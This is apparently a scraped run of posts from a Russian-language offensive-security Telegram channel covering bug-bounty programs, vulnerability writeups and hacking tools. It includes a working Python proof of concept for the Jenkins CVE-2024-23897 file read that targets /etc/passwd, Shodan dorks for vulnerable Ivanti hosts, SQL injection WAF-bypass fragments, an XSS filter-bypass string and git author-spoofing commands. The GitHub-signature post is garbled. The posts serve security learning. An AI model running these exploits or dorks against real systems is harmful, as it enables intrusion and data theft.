11529
Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn
🎁 Dev(Sec)Ops RoadMap как найти работу
#карьера #devsecops
В чате канала вчера спрашивали про roadmap для DevSecOps. Что нужно учить?
Пункт 1. Я считаю правильным ответом на данный вопрос всегда являлся и будет являться ответ: зайди на сайт с вакансиями, найди выбранную должность и прочитай 20-30 вакансий, выпиши повторяющиеся термины и изучи что это. Это применимо к любой стране и к любой должности, если вы конечно не выбираете учить то, чего ещё нет на рынке. В таком случае откуда вы об этом узнали, оттуда начинайте поиск информации о необходимых навыках.
Но мы же люди ленивые? Лично я, да. Все всегда хочется искать что-то самостоятельно, а найти готовый roadmap или mindmap, где за вас умные люди составили график, что вам нужно учить. В таком случае нашёл для Вас несколько интересных материалов:
А Вы точно уверены, что перед тем как стать DevSecOps, вы изучили инструменты DevOps и научились применять эти практики?
Также отдельное спасибо @belka_e
💻 Коллекция эксплойтов AI/ML
Авторы пошерстили атаки на инструменты, библиотеки и фреймворки, используемые для создания, обучения и развертывания моделей машинного обучения и собрали репозиторий содержащий эксплойты и шаблоны для их эксплуатации.
Многие из этих атак приводят к полному захвату системы и/или потере конфиденциальных данных, моделей или учетных данных, зачастую, без аутентификации.
Каждый уязвимый инструмент имеет несколько подпапок, содержащих три типа утилит: модули Metasploit, шаблоны Nuclei и шаблоны для CSRF.
Ссылка на GitHub
#web #ai #tools
😈 Server Side Prototype Pollution Gadgets Scanner для BurpSuite
Позволяет автоматизировать сканирование HTTP-запросов на наличие уязвимостей, связанных с prototype pollution, и производит обнаружение и эксплуатацию известных гаджетов в библиотеках, в основном с фокусом на Node.js.
Подробное описание про данные уязвимости и работу расширения читайте в блоге автора или на GitHub по ссылке ниже.
Ссылка на GitHub
#web #pp
https://github.com/d0ge/sessionless
Sessionless — расширение для Burp Suite, чтобы редактировать, подписывать, проверять и проводить атаки на токены, которые используют веб-фреймворки для авторизации.
Состоит из модулей: Django TimestampSigner, ItsDangerous Signer, Express cookie-session middleware, OAuth2 Proxy, Tornado’s signed cookies, Ruby Rails Signed cookies.
Каждый из них позволяет брутфорсить секреты, смотреть содержимое и генерировать данные для админской сессии.
⌨️ Standoff 365. Самое красивое недопустимое событие в деталях
Статья от @VeeZy_VeeZy про взлом новостного портала, путешествие в страну Kubernetes, кражу денежных средств с клиентских счетов, и это далеко не всё! Подробнее читайте на Хабре.
Ссылка на статью
#web #ctf #privesc #kuber
🏆Топ-10 техник веб-хакинга в 2023 году по версии PortSwigger
Традиционная номинация от Portswigger, цель которой — выявить самые значимые исследования в области веб-безопасности, опубликованные в 2023 году.
Каждая статья в списке заслуживает внимание и, если вы еще не ознакомились, то крайне рекомендую.
Ссылка на статью
#web
😎 Поступила инфа, что 18 апреля у VK намечается закрытая тусовка для багхантеров.
А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.
А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.
Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/
🫤 Ivanti XML External Entity (XXE)
Обнаружена XXE в продуктах Ivanti (CVE-2024-22024), позволяющая неавторизованному злоумышленнику, получить доступ к внутренним ресурсам. Подробнее читайте в блоге.
Дорк для Shodan:
http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"
🔥 Positive Technologies запускает багбаунти на 60 млн рублей!
В программу Positive Dream Hunting добавлено второе недопустимое событие — внедрение закладки в код продуктов Positive Technologies.
Вознаграждение получит багхантер (или команда), который сможет разместить условно вредоносную рабочую сборку с потенциально зловредным кодом на внутреннем сервере обновлений gus.ptsecurity.com либо публичных серверах update.ptsecurity.com.
Белым хакерам, которые выполнят один или несколько шагов до потенциальной реализации недопустимого события, будет присуждаться поощрительное вознаграждение. В частности:
• 300–500 тыс. рублей — за преодоление сетевого периметра и закрепление на узле
• 3–5 млн рублей — за внедрение кода в публичный релиз продукта на этапе хранения или тестирования
Все условия программы можно найти на нашем сайте.
Кроме того, Positive Technologies увеличивает вознаграждение за реализацию первого недопустимого события — кражу денег со счетов — до 60 млн рублей. До сих пор выполнить сценарий полностью не смог ни один багхантер.
😏 Испытать свои силы можно здесь: https://bugbounty.standoff365.com/programs/ptsecurity_ns/
🧠 Захват аккаунта ChatGPT - Wildcard Web Cache Deception
История о том как проблемы с wildcard и несоответствием в нормализации путей между CDN и веб-сервером могут привести к кэширования важных конечных точек.
Ссылка на статью
#web #cache #ato
💉 SQLi-Sleeps
Небольшой скрипт для автоматизации поиска Time-Based SQL инъекций в списке url-адресов.
Ссылка на GitHub
#web #sqli
😈 Обнаружение нестандартных заголовков в API с помощью фильтров Burp Bambdas
Что, если я скажу вам, что многие API используют нестандартные пользовательские HTTP-заголовки для управления бизнес-логикой и поведением?
Одним из простых способов увидеть такие заголовки в Burp, является применение шаблона для Bambdas:
if( !requestResponse.hasResponse() )
{
return false;
}
String[] standardHeaders = {
"accept-patch",
"accept-ranges",
"access-control-allow-credentials",
"access-control-allow-headers",
"access-control-allow-methods",
"access-control-allow-origin",
"access-control-expose-headers",
"access-control-max-age",
"age",
"allow",
"alt-svc",
"cache-control",
"clear-site-data",
"connection",
"content-disposition",
"content-encoding",
"content-language",
"content-length",
"content-location",
"content-range",
"content-security-policy",
"content-transfer-encoding",
"content-type",
"cross-origin-embedder-policy",
"cross-origin-opener-policy",
"cross-origin-resource-policy",
"date",
"delta-base",
"etag",
"expect-ct",
"expires",
"feature-policy",
"host",
"im",
"keep-alive",
"last-modified",
"link",
"location",
"pragma",
"proxy-authenticate",
"public-key-pins",
"referrer-policy",
"retry-after",
"server",
"set-cookie",
"strict-transport-security",
"tk",
"trailer",
"transfer-encoding",
"upgrade",
"vary",
"via",
"warning",
"www-authenticate",
"x-content-type-options",
"x-frame-options",
"x-permitted-cross-domain-policies",
"x-xss-protection"
};
List headersList = Arrays.asList(standardHeaders);
var headers = requestResponse.response().headers();
List unexpectedHeaders = new ArrayList();
for( var header : headers ) {
var headerName = header.name().toLowerCase();
if( !headersList.contains( headerName ) ) {
unexpectedHeaders.add( headerName );
}
}
if( unexpectedHeaders.size() > 0 ) {
requestResponse.annotations().setHighlightColor( HighlightColor.GRAY );
requestResponse.annotations().setNotes(
"Non-standard Headers: " + String.join( ",", unexpectedHeaders )
);
}
else {
// Maybe don't trample on existing Notes in the future??
requestResponse.annotations().setHighlightColor( HighlightColor.NONE );
requestResponse.annotations().setNotes("");
}
return true;
💻 Раскрытые уязвимости с багбаунти, ч.8
1️⃣ Remote Code Execution через Local File Inclusion
2️⃣ Reflected XSS на поддомене American Airlines
3️⃣ Stored XSS на сайте Microsoft
#web #rce #xss
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
💰Как предложение от банка привело к раскрытию личных данных и награде в 5000$
Небольшой рассказ о том, как обычное почтовое предложение позволяло злоумышленнику получить доступ к данным других пользователей и раскрыть конфиденциальную личную информацию.
Ссылка на статью
#web #idor #leak
Bighuge BLS OSINT Tool
BEE·bot — рекурсивный интернет-сканер для хакеров, вдохновленный Spiderfoot.
Возможности:
— сканирование нескольких целей одновременно
— скриншоты найденных урлов
— набор offensive-модулей
— пермутации поддоменов на основе AI
— Нативный вывод в Neo4j
— Python API + документация для разработчиков
Ссылка на GitHub
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
🪟 SSRF в Microsoft Designer
Статья об эксплуатации SSRF, которую обнаружили и успешно использовали в одном из продуктов искусственного интеллекта от Microsoft.
Ссылка на статью
#web #ssrf #ai
Cпешите видеть 🫣 и слышать на Яндекс Музыке, Apple Podcasts и ВКонтакте
Сегодня ведущий выпуска — Сергей Зыбнев, пентестер Awillix, автор канала «Похек». Гость — Антон Лопаницын более известный как bo0om, исследователь информационной безопасности и блогер.
Ламповый разговор о направлениях развития и мотивации ИБ-специалистов, об успехах, нелепых провалах, смешных уязвимостях и глубокой экспертизе в области трусошаренья.
🧠 Как были найдены 2 Stored XSS в ChatGPT
Подробная статья про доведение XSS до импакта, борьбу с CSP, использование Mass Assignment и обход SameSite Cookies.
Ссылка на статью
#web #xss #csp
😈 Social Engineering — самый крупный ресурс в Telegram, посвященный Информационной Безопасности, OSINT и Cоциальной Инженерии.
Особое внимание стоит обратить на следующую информацию:
➖ Собственный бот, который проверит Ваш файл 70 антивирусами одновременно;
➖ Коллекция инструментов и ресурсов для поиска информации о человеке;
➖ Актуальные методы социальной инженерии и профайлинга;
➖ Подборка бесплатных курсов для изучения компьютерных сетей.
Вас ждёт только актуальный и качественный материал. @S.E.
💻 Раскрытые уязвимости с багбаунти, ч.9
1️⃣ Захват аккаунта через Self-XSS
Пример того, как с помощью дополнительного функционала можно от бесполезной Self XSS выжать захват аккаунта в один клик. Подробнее смотрите в отчете.
2️⃣ SQL инъекция в POST запросе
Идентификация и эксплуатация Union-based SQL-инъекции в POST запросе на основе ответов сервера. Подробнее про эксплуатацию подобных уязвимостей тут.
3️⃣ OTP Bypass
Обходим подтверждение OTP через манипуляцию с ответом сервера. Про такие баги я вам рассказывал тут.
#web #xss #ato #cache #sqli
Недавно нашел обход фильтрации тегов в golang.
Для строки <a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM:
html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>
💉 Про обход защиты от SQL-инъекций
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает нормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.
Например, добавив управляющие символы , типа %00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.
Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
🎤Подкаст Just Security by Awillix #3. Путь исследователя
На выходных послушал подкаст с Paul Axe, на счету которого несколько 0day'ев, множество RCE'шек, участия в международных конференциях и CTF'ах и тд… Рекомендую глянуть и вам про его опыт, мотивацию, подход к поиску уязвимостей, багбаунти, CTF и сертификации.
#web #ctf #0day #bb
💀 SSRF приводящий к RCE в Ivanti Connect Secure
Раскрытый сегодня PoC для SSRF в Ivanti Pulse Connect Secure (CVE-2024-21893) является отличным примером того, как с помощью полностью слепой SSRF можно достичь RCE.
Подробнее читайте в блоге по ссылке.
Дорк для Shodan:
http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"
📱 Обход WAF через мобильное приложение
Иногда WAF на вебе не позволяют встраивать полезную нагрузку в запросы, однако вы можете ввести свою полезную нагрузку через приложение для Android или IOS и она может отработать на веб-сайте без какой-либо блокировки.
#web #waf
😒 Apache Tomcat HTTP Request Smuggling (Client- Side Desync)
Недавно была найдена критическая уязвимость в Apache Tomcat, которой был присвоен код CVE-2024-21733.
Уязвимость позволяет злоумышленникам заставить браузер жертвы рассинхронизировать свое соединение с веб-сайтами, размещенными поверх Apache Tomcat, что приводит к контрабанде конфиденциальных данных с сервера и/или клиентских подключений (смотри скрин ниже).
Для получения дополнительной информации об атаках десинхронизации со стороны клиента, можете почитать исследование Джеймса Кеттла.
Ссылка на отчет
#web #cve #poc
Подделка подписей на Github
Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
git config --global user.name "Linus Torvalds"
git config --global user.email "torvalds@linux-foundation.org"
GitHub <noreply@github.com> и тоже будет считаться верифицированным. gh-gpgsign и возвращает подписанный результат./\Aauthor (.+?) <(.+)>/, должны быть равна имени текущего залогиненного пользователя.author <583231+octocat@users.noreply.github.com> 1682188800 +0000
author username <user@example.com> 1682188800 +0000
История одной уязвимости в Chrome
Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
Twitter
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
🤕 Неочевидные угрозы: как защититься от атак на десериализацию, XSS и чтение произвольных файлов
Злоумышленники могут успешно атаковать 98% веб-приложений. И это не просто громкие цифры, а данные из исследования Positive Technologies. Как такое возможно, если есть инструменты и практики типа SAST, DAST и WAF, а разработчики вроде бы нормально кодят?
Давайте я объясню, как устроены опасные атаки, на примере с разработчиком Василием, который работает в интернет-магазине и которому начальство подкидывает разные интересные задачки.
➡️ Читать далее
🌚 @poxek